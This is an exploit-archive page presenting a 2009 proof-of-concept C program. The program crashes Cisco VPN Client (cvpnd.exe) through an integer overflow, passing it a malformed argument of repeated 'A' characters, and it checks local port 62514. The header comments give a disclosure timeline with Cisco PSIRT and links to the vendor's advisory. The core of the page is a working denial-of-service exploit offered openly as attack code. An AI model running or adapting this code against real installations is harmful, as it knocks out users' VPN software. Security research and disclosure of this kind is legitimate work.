Cisco VPN Client Integer Overflow (DOS)

🗓️ 21 Nov 2009 00:00:00Reported by Alex HernandezType
zdt🔗 0day.today👁 15 Views
Cisco VPN Client Integer Overflow (DOS) - Identified security vulnerability in Cisco VPN client software allows for denial of service attack through integer overflow. Exploit can crash the application. Reported to Cisco PSIRT who confirmed the vulnerability, but fix took several months. Public disclosure made with details available on Cisco BugToolKit and Intellishield Alert
=======================================
Cisco VPN Client Integer Overflow (DOS)
=======================================


# Title: Cisco VPN Client Integer Overflow (DOS)
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alex Hernandez
# Published: 2009-11-21
# Verified: yes

view source
print?
/*
Cisco VPN client version 5.0.03.0560
Cisco VPN client Version 5.0.04.0300
Cisco VPN client Version 5.0.05.0290
Cisco VPN client Version 4.8.02.0010
*/
 
/*
 * Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
 *
 * By Alex Hernandez aka alt3kx (c) November 2009
 *
 * This POC is only for test. If an application read a malformed chars
 * file like this POC, the application will be crashed.
 *
 * We tested this code on:
 *
 * Windows Vista Bussines SP1 Spanish
 * Windows Vista Home Premium  SP1 English
 * Windows 2000 Server English
 * Windows XP Professional SP3
 *
 * Cisco VPN client version 5.0.03.0560
 * Cisco VPN client Version 5.0.04.0300
 * Cisco VPN client Version 5.0.05.0290
 * Cisco VPN client Version 4.8.02.0010
 *
 * Compiled on VC++ win32
 * 
 * Friends:
 * sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x
 *
 * TT & DSRT
 * daSh, p4r4n01ds, darkslaker, beto, motis.
 *
 * Very special credits to:
 *
 * str0ke (milw0rm.com)
 * rathaus (securiteam.com)
 * FX (Phenoelit.de)
 * dSR! (segfault.es)
 * 0dd (0dd.com)
 *
 *
 * PH-Neutral 0x7d9, We hope to see u there intruders
 *
 * ---------------
 * Report Timeline
 * ---------------
 * 06/03/2009   The vulnerability was discovered.
 * 07/03/2009   Exploit/PoC code was developed (private).
 * 09/03/2009   Cisco PSIRT was notified about the issue.
 * 11/03/2009   Vendor response asking for details of the testing environment.
 * 12/03/2009   Test scenario explained and sent a PDF document with details.
 * 16/03/2009   Developers/PSIRT confirmed the vulnerability.
 * 19/03/2009   New test scenarios around new versions (CISCO VPN client).
 * 23/03/2009   CISCO PSIRT assing an internal tracking PSIRT-0676131279.
 * 23/03/2009   CISCO PSIRT assing an Bug ID-CSCsz49276.
 * 15/04/2009   New Advisory release (private).
 * 16/04/2009   New PSIRT feedback no ETA avaiable.
 * 23/04/2009   The development team working the fix.
 * 01/05/2009   The development team estimated one month to fix.
 * 01/06/2009   New PSIRT feedback, no ETA available.
 * 29/06/2009   The development team estimated one month to fix.
 * 28/07/2009   The development team working on maitenance release.
 * 28/07/2009   The development team estimated one month to fix.
 * 02/09/2009   New vulnerabilities found on CISCO VPN client.
 * 02/09/2009   The development team can not publish the new version 5.0.6.
 * 02/09/2009   The development team working on maitenance release.
 * 02/09/2009   The development team estimated one month to fix.
 * 10/09/2009   The BETA program should be finished by the end of Oct
 * and the client posted next month.
 * 07/10/2009   The development team estimated one month to fix.
 * 11/11/2009   New PSIRT feedback RNA avaiable.
 * 19/11/2009   The vulnerability goes public and PSIRT is informed.
 * 19/11/2009   Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
 *
 * CISCO Fix and Details:
 *
 * BugToolKit:
 * http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276
 *
 * Intellishield Alert:
 * http://tools.cisco.com/security/center/viewAlert.x?alertId=19445
 *
 */
  
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment ( lib, "ws2_32.lib" )
  
int CheckPortUDP( short int nPort )
{
    struct sockaddr_in nSockServer;
  
    WSADATA wsaData;
  
    int lBusy = 0;
    int nSocket;
  
    /* Initialization */
    if( WSAStartup( 0x0101, &wsaData ) == 0 )
    {
        /* Create Socket */
        nSockServer.sin_family      = AF_INET;
        nSockServer.sin_port        = htons( nPort );
        nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
  
        /* Check UDP Protocol */
        nSocket = socket( AF_INET, SOCK_DGRAM, 0 );
  
        lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,
                            sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );
  
        /* Close Socket if Busy */
        if( lBusy )
            closesocket( nSocket );
  
        /* Close Winsock */
        WSACleanup();
    }
  
    /* Return */
    return( lBusy );
}
 
int CheckPortTCP( short int nPort )
{
    struct sockaddr_in nSockServer;
  
    WSADATA wsaData;
  
    int lBusy = 0;
    int nSocket;
  
    /* Initialization */
    if( WSAStartup( 0x0101, &wsaData ) == 0 )
    {
        /* Create Socket */
        nSockServer.sin_family      = AF_INET;
        nSockServer.sin_port        = htons( nPort );
        nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
  
        /* Check TCP Protocol */
        nSocket = socket( AF_INET, SOCK_STREAM, 0 );
  
        lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,
                     sizeof( nSockServer ) ) == 0 );
  
        /* Close Socket if Busy */
        if( lBusy )
            closesocket( nSocket );
  
        /* Close Winsock */
        WSACleanup();
    }
  
    /* Return */
    return( lBusy );
}
 
int main(void)
{
 
    char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";
    //uncomment this line for Windows XP Spanish versions
    //char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";
    char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    PROCESS_INFORMATION pif;
    STARTUPINFO si;
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
 
    BOOL bRet = CreateProcess(
        szPath,
        buffer,
        NULL,
        NULL,
        FALSE,
        0,
        NULL,
        NULL,
        &si,
        &pif);
     
    system("cls");
    printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");
    printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n"); 
 
     
    /* Check for TCP Port */
  
    if( CheckPortTCP(62514) )
        printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");
    else
        printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");
 
    /* Check for UDP Port */
  
    if( CheckPortUDP(62514) )
        printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");
    else
        printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");
 
    if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);
    return 1;}
 
    else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);
        printf("\n[+] Few seconds to crash the program...\n");
        printf("[+] Exploit success...\n\n");
    return 1;}
 
    CloseHandle(pif.hProcess);
    CloseHandle(pif.hThread);
 
}



#  0day.today [2018-04-08]  #
21 Nov 2009 00:00Current
7High risk
Vulners AI Score7